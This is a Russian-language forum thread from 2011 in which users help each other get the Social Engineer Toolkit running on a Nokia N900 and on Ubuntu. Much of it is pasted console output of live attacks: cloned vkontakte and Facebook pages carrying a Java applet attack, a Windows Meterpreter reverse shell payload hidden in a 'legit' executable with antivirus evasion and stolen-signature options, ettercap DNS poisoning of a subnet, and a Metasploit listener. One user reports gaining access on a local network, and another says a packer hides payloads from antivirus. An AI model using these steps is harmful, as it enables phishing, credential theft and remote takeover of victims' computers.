46

Re: Social Engineer Toolkit

Я сам не все настроил, для 100% функционала не хватает apache, sendmail,
пока подключил ettercap,pefile,ssl

живее всех живых

Сайт ZrX

Поделиться

47

Re: Social Engineer Toolkit

А ты не мог бы реально делиться своими настройками или применением программы хоть в какой то части? Все пытаются что то сделать и запустить... И сейчас каждый идет путем проб и ошибок... Так может сократим количество времени потраченное на прохождение одних и тех же путей (ошибок) и начнем здесь все описывать???

Поделиться

48

Re: Social Engineer Toolkit

Свой конфиг позже залью

Добавлено: 10.02.2011 18:26:54

Ставь пока
http://maemoworld.ru/forum/viewtopic.php?id=3868
http://maemoworld.ru/forum/viewtopic.php?id=3867


Добавлено: 10.02.2011 18:30:43

На конкурирующем ресурсе статья про metasploit взлом Windows XP перепечатывать нет желания.

живее всех живых

Сайт ZrX

Поделиться

49

Re: Social Engineer Toolkit

Забыл нужен еще пакет icedtea6

живее всех живых

Сайт ZrX

Поделиться

50

Re: Social Engineer Toolkit

Установи UPX unpacker  отсюда code.google.com/p/pefile 
установка:
python setup.py build
python setup.py install

вот блин установил на свою голову! я сет полностью снес и заново поставил, но вот эта ошибка опять вылетает:

Enter the url to clone: http://www.vkontakte.ru

[*] Cloning the website: http://www.vkontakte.ru
[*] This could take a little bit...
[*] Injecting Java Applet attack into the newly cloned website.


Something went wrong, printing the error: name 'ipaddr' is not defined
netstat: invalid option -- p
BusyBox v1.10.2 (Debian 3:1.10.2.legal-1osso30+0m5) multi-call binary

Usage: netstat [-laentuwxr]

netstat: invalid option -- p
BusyBox v1.10.2 (Debian 3:1.10.2.legal-1osso30+0m5) multi-call binary

Usage: netstat [-laentuwxr]

/home/user/set # 

ZrX скажи мне только одно - как удалить мне теперь этот UPX unpacker?

мой твиттер - https://twitter.com/SergeyGrim
мой ютюб канал http://www.youtube.com/MrSergeyGrim

Поделиться

51

Re: Social Engineer Toolkit

Он не причем выбираешь java атаку icedtea6 установлен?

Добавлено: 10.02.2011 18:58:44

pefile это упаковщик чтоб антивирусы не палили.

живее всех живых

Сайт ZrX

Поделиться

52

Re: Social Engineer Toolkit

icetea6 - думаешь я знаю что это? wink ничего подобного я не устанавливал.
я почему так говорю - ошибка появилась после установки pefile.

вот еще пример ошибки:

1. The Java Applet Attack Method
2. The Metasploit Browser Exploit Method
3. Credential Harvester Attack Method
4. Tabnabbing Attack Method
5. Man Left in the Middle Attack Method
6. Web Jacking Attack Method 
7. Multi-Attack Web Method
8. Return to the previous menu

Enter your choice (press enter for default): 1


The first method will allow SET to import a list of pre-defined
web applications that it can utilize within the attack.

The second method will completely clone a website of your choosing
and allow you to utilize the attack vectors within the completely
same web application you were attempting to clone.

The third method allows you to import your own website, note that you
should only have an index.html when using the import website
functionality.

[!] Website Attack Vectors [!]

1. Web Templates
2. Site Cloner 
3. Custom Import 
4. Return to main menu
    
Enter number (1-4): 1


Select a template to utilize within the web clone attack

1. Java Required 
2. Gmail
3. Google
4. Facebook
5. Twitter

Enter the one to use: 4
[*] UPX packer not found in the pathname specified in config. Disabling UPX packing for executable!
What payload do you want to generate:

Name:                                      Description:

1. Windows Shell Reverse_TCP               Spawn a command shell on victim and send back to attacker.
2. Windows Reverse_TCP Meterpreter         Spawn a meterpreter shell on victim and send back to attacker.
3. Windows Reverse_TCP VNC DLL             Spawn a VNC server on victim and send back to attacker.
4. Windows Bind Shell                      Execute payload and create an accepting port on remote system.
5. Windows Bind Shell X64                  Windows x64 Command Shell, Bind TCP Inline
6. Windows Shell Reverse_TCP X64           Windows X64 Command Shell, Reverse TCP Inline
7. Windows Meterpreter Reverse_TCP X64     Connect back to the attacker (Windows x64), Meterpreter
8. Windows Meterpreter Egress Buster       Spawn a meterpreter shell and find a port home via multiple ports
9. Windows Meterpreter Reverse HTTPS       Tunnel communication over HTTP using SSL and use Meterpreter
10. Windows Meterpreter Reverse DNS        Use a hostname instead of an IP address and spawn Meterpreter
11. Import your own executable             Specify a path for your own executable

Enter choice (hit enter for default): 2

Below is a list of encodings to try and bypass AV. 

Select one of the below, 'backdoored executable' is typically the best.

1. avoid_utf8_tolower (Normal)
2. shikata_ga_nai (Very Good)
3. alpha_mixed (Normal)
4. alpha_upper (Normal)
5. call4_dword_xor (Normal)
6. countdown (Normal)
7. fnstenv_mov (Normal)
8. jmp_call_additive (Normal)
9. nonalpha (Normal)
10. nonupper (Normal)
11. unicode_mixed (Normal)
12. unicode_upper (Normal)
13. alpha2 (Normal)
14. No Encoding (None)
15. Multi-Encoder (Excellent)
16. Backdoored Executable (BEST)

Enter your choice (enter for default): 
[-] Enter the PORT of the listener (enter for default): 

[-] Backdooring a legit executable to bypass Anti-Virus. Wait a few seconds...
/bin/sh: ruby: not found
[-] Backdoor completed successfully. Payload is now hidden within a legit executable.
[*] UPX Encoding is set to ON, attempting to pack the executable with UPX encoding.
[*] Digital Signature Stealing is ON, hijacking a legit digital certificate.



Something went wrong, printing the error: [Errno 2] No such file or directory: 'src/html/msf.exe'
netstat: invalid option -- p
BusyBox v1.10.2 (Debian 3:1.10.2.legal-1osso30+0m5) multi-call binary

Usage: netstat [-laentuwxr]

netstat: invalid option -- p
BusyBox v1.10.2 (Debian 3:1.10.2.legal-1osso30+0m5) multi-call binary

Usage: netstat [-laentuwxr]

/home/user/set # 
мой твиттер - https://twitter.com/SergeyGrim
мой ютюб канал http://www.youtube.com/MrSergeyGrim

Поделиться

53

Re: Social Engineer Toolkit

У тебя не установленны пакеты ruby следовательно metasploit не работает

Enter your choice (press enter for default): 1


The first method will allow SET to import a list of pre-defined
web applications that it can utilize within the attack.

The second method will completely clone a website of your choosing
and allow you to utilize the attack vectors within the completely
same web application you were attempting to clone.

The third method allows you to import your own website, note that you
should only have an index.html when using the import website
functionality.

[!] Website Attack Vectors [!]

1. Web Templates
2. Site Cloner 
3. Custom Import 
4. Return to main menu
    
Enter number (1-4): 1


Select a template to utilize within the web clone attack

1. Java Required 
2. Gmail
3. Google
4. Facebook
5. Twitter

Enter the one to use: 4
[*] UPX packer not found in the pathname specified in config. Disabling UPX packing for executable!
What payload do you want to generate:

Name:                                      Description:

1. Windows Shell Reverse_TCP               Spawn a command shell on victim and send back to attacker.
2. Windows Reverse_TCP Meterpreter         Spawn a meterpreter shell on victim and send back to attacker.
3. Windows Reverse_TCP VNC DLL             Spawn a VNC server on victim and send back to attacker.
4. Windows Bind Shell                      Execute payload and create an accepting port on remote system.
5. Windows Bind Shell X64                  Windows x64 Command Shell, Bind TCP Inline
6. Windows Shell Reverse_TCP X64           Windows X64 Command Shell, Reverse TCP Inline
7. Windows Meterpreter Reverse_TCP X64     Connect back to the attacker (Windows x64), Meterpreter
8. Windows Meterpreter Egress Buster       Spawn a meterpreter shell and find a port home via multiple ports
9. Windows Meterpreter Reverse HTTPS       Tunnel communication over HTTP using SSL and use Meterpreter
10. Windows Meterpreter Reverse DNS        Use a hostname instead of an IP address and spawn Meterpreter
11. Import your own executable             Specify a path for your own executable

Enter choice (hit enter for default): 

Below is a list of encodings to try and bypass AV. 

Select one of the below, 'backdoored executable' is typically the best.

1. avoid_utf8_tolower (Normal)
2. shikata_ga_nai (Very Good)
3. alpha_mixed (Normal)
4. alpha_upper (Normal)
5. call4_dword_xor (Normal)
6. countdown (Normal)
7. fnstenv_mov (Normal)
8. jmp_call_additive (Normal)
9. nonalpha (Normal)
10. nonupper (Normal)
11. unicode_mixed (Normal)
12. unicode_upper (Normal)
13. alpha2 (Normal)
14. No Encoding (None)
15. Multi-Encoder (Excellent)
16. Backdoored Executable (BEST)

Enter your choice (enter for default): 
[-] Enter the PORT of the listener (enter for default): 

[-] Backdooring a legit executable to bypass Anti-Virus. Wait a few seconds...
[-] Backdoor completed successfully. Payload is now hidden within a legit executable.
[*] UPX Encoding is set to ON, attempting to pack the executable with UPX encoding.
[*] Digital Signature Stealing is ON, hijacking a legit digital certificate.

********************************************************
Do you want to create a Linux/OSX reverse_tcp payload
in the Java Applet attack as well?
********************************************************

Enter choice yes or no: 

[*] ARP Cache Poisoning is set to ON.

[*] Welcome to the SET Ettercap Integration Menu [*]

This attack will poison all victims on your local subnet, and redirect them
when they hit a specific website. The next prompt will ask you which site you
will want to trigger the DNS redirect on. A simple example of this is if you
wanted to trigger everyone on your subnet to connect to you when they go to
browse to www.google.com, the victim would then be redirected to your malicious
site. You can alternatively poison everyone and everysite by using the wildcard 
'*' flag.

IF YOU WANT TO POISON ALL DNS ENTRIES (DEFAULT) JUST HIT ENTER OR *
        
Example: http://www.google.com

Enter the site to redirect to attack machine (enter for default): 
Do you want to use bridged mode yes or no: 
[*] LAUNCHING ETTERCAP DNS_SPOOF ATTACK!

[*] Cloning the website: http://192.168.1.2
[*] This could take a little bit...
[*] Injecting Java Applet attack into the newly cloned website.
[*] Filename obfuscation complete. Payload name is: Fg6OPUv9F
[*] Malicious java applet website prepped for deployment


***************************************************
Web Server Launched. Welcome to the SET Web Attack.
***************************************************

[--] Tested on IE6, IE7, IE8, Safari, Chrome, and FireFox [--]

[*] Launching MSF Listener...
[*] This may take a few to load MSF...
[-] ***
[-] * WARNING: No database support: String User Disabled Database Support
[-] ***

                                  _       _
             _                   | |     (_)_
 ____   ____| |_  ____  ___ ____ | | ___  _| |_
|    \ / _  )  _)/ _  |/___)  _ \| |/ _ \| |  _)
| | | ( (/ /| |_( ( | |___ | | | | | |_| | | |__
|_|_|_|\____)\___)_||_(___/| ||_/|_|\___/|_|\___)
                           |_|


       =[ metasploit v3.5.1-release [core:3.5 api:1.0]
+ -- --=[ 635 exploits - 314 auxiliary
+ -- --=[ 215 payloads - 27 encoders - 8 nops
       =[ svn r11338 updated 58 days ago (2010.12.14)

Warning: This copy of the Metasploit Framework was last updated 58 days ago.
         We recommend that you update the framework at least every other day.
         For information on updating your copy of Metasploit, please see:
             http://www.metasploit.com/redmine/projects/framework/wiki/Updating

resource (src/program_junk/meta_config)> use exploit/multi/handler
resource (src/program_junk/meta_config)> set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
resource (src/program_junk/meta_config)> set LHOST 0.0.0.0
LHOST => 0.0.0.0
resource (src/program_junk/meta_config)> set LPORT 443
LPORT => 443
resource (src/program_junk/meta_config)> set ExitOnSession false
ExitOnSession => false
resource (src/program_junk/meta_config)> exploit -j
[*] Exploit running as background job.
[*] Started reverse handler on 0.0.0.0:443 
[*] Starting the payload handler...
msf exploit(handler) > 
живее всех живых

Сайт ZrX

Поделиться

54

Re: Social Engineer Toolkit

А это тогда что:

http://imageplay.net/m7Gbd138639/Screenshot_20110210_192052_thumb.jpg

http://imageplay.net/m7Gbd138640/Screenshot_20110210_192104_thumb.jpg

мой твиттер - https://twitter.com/SergeyGrim
мой ютюб канал http://www.youtube.com/MrSergeyGrim

Поделиться

55

Re: Social Engineer Toolkit

http://imageplay.net/m7Gbd138670/Screenshot_20110210_230538_thumb.jpg
вообще это статья УК так что 10 раз подумай.

живее всех живых

Сайт ZrX

Поделиться

56

Re: Social Engineer Toolkit

ZrX пишет:

вообще это статья УК так что 10 раз подумай.

1 - кто бы говорил wink
2 - это в научных целях

мой твиттер - https://twitter.com/SergeyGrim
мой ютюб канал http://www.youtube.com/MrSergeyGrim

Поделиться

57

Re: Social Engineer Toolkit

минут 20 назад у тебя сайт работал?

живее всех живых

Сайт ZrX

Поделиться

58

Re: Social Engineer Toolkit

какой еще сайт? нет не у меня.

мой твиттер - https://twitter.com/SergeyGrim
мой ютюб канал http://www.youtube.com/MrSergeyGrim

Поделиться

59

Re: Social Engineer Toolkit

Неа все таже ошибка! Кстати метахрень я без сета запустить смог...

мой твиттер - https://twitter.com/SergeyGrim
мой ютюб канал http://www.youtube.com/MrSergeyGrim

Поделиться

60

Re: Social Engineer Toolkit

ZrX пишет:

вообще это статья УК так что 10 раз подумай.

На самом деле это спорный вопрос... Статья или нет...  big_smile

Добавлено: 10.02.2011 23:02:58

Значится так... На N900 эта хрень у меня не работает... Или чего то не хватает или я олень...
Зато на компе, Ubuntu 10.04 все заработало... Но опять же с оговоркой... Удалось получить доступ как написанно в статье на конкурирующем сайте, но все это в рамках внутренней сети... Если все проделывать по IP не "внутренним" все упирается в мой роутер и глохнет...


Добавлено: 10.02.2011 23:04:18

Dart пишет:

Неа все таже ошибка! Кстати метахрень я без сета запустить смог...

Да... К стати... Без SETa кажись проще...

Поделиться